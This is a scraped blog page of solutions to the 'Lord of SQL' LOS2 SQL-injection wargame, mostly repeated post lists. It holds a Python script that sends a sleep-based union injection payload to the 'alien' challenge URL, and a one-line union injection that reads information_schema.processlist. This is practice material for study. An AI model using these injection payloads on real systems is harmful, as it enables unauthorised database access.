'Wargame > Lord of SQL' 카테고리의 다른 글
LOS2 chupacabra ~ incubus (0) | 2019.05.30 |
---|---|
LOS2 All Clear (0) | 2019.05.10 |
LOS2 cyclops (0) | 2019.05.10 |
LOS2 godzilla (0) | 2019.05.10 |
LOS2 death (0) | 2019.05.10 |
LOS2 chupacabra ~ incubus (0) | 2019.05.30 |
---|---|
LOS2 All Clear (0) | 2019.05.10 |
LOS2 cyclops (0) | 2019.05.10 |
LOS2 godzilla (0) | 2019.05.10 |
LOS2 death (0) | 2019.05.10 |
LOS2에 WAF Bypass 컨셉의 문제 4개가 추가되서 풀어봤다. 풀면서 도움도 많이됬고 엄청 재밌었다.
LOS2 All Clear (0) | 2019.05.30 |
---|---|
LOS2 chupacabra ~ incubus (0) | 2019.05.30 |
LOS2 cyclops (0) | 2019.05.10 |
LOS2 godzilla (0) | 2019.05.10 |
LOS2 death (0) | 2019.05.10 |
LOS2 death (0) | 2019.05.10 |
---|---|
LOS2 cthulhu (0) | 2019.05.10 |
LOS2 alien (0) | 2018.10.10 |
LOS2 zombie (0) | 2018.10.10 |
LOS2 ouroboros (0) | 2018.10.10 |
import requests
def request(payload):
url = "http://los.rubiya.kr/alien_91104597bf79b4d893425b65c166d484.php"
params = {'no':payload}
headers = {'Cookie':'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
response = requests.get(url,params=params,headers=headers)
if "Clear" in response.text:
return True
else:
return False
payload = "4444 union select concat(char(substring(now(),length(now()))%2+96+sleep(1)),0x646d696e)#' union select concat(char(substring(now(),length(now()))%2+97+sleep(1)),0x646d696e)#"
for i in range(1,20):
if request(payload) == True:
print str(i) + " Request Success!"
break
else:
print str(i) + " Request Fail.."
LOS2 cthulhu (0) | 2019.05.10 |
---|---|
LOS2 All Clear (0) | 2018.10.10 |
LOS2 zombie (0) | 2018.10.10 |
LOS2 ouroboros (0) | 2018.10.10 |
LOS2 phantom (0) | 2018.10.10 |
payload
' union select substring(info,38,80) pw from information_schema.processlist -- x
LOS2 All Clear (0) | 2018.10.10 |
---|---|
LOS2 alien (0) | 2018.10.10 |
LOS2 ouroboros (0) | 2018.10.10 |
LOS2 phantom (0) | 2018.10.10 |
LOS2 frankenstein (0) | 2018.10.10 |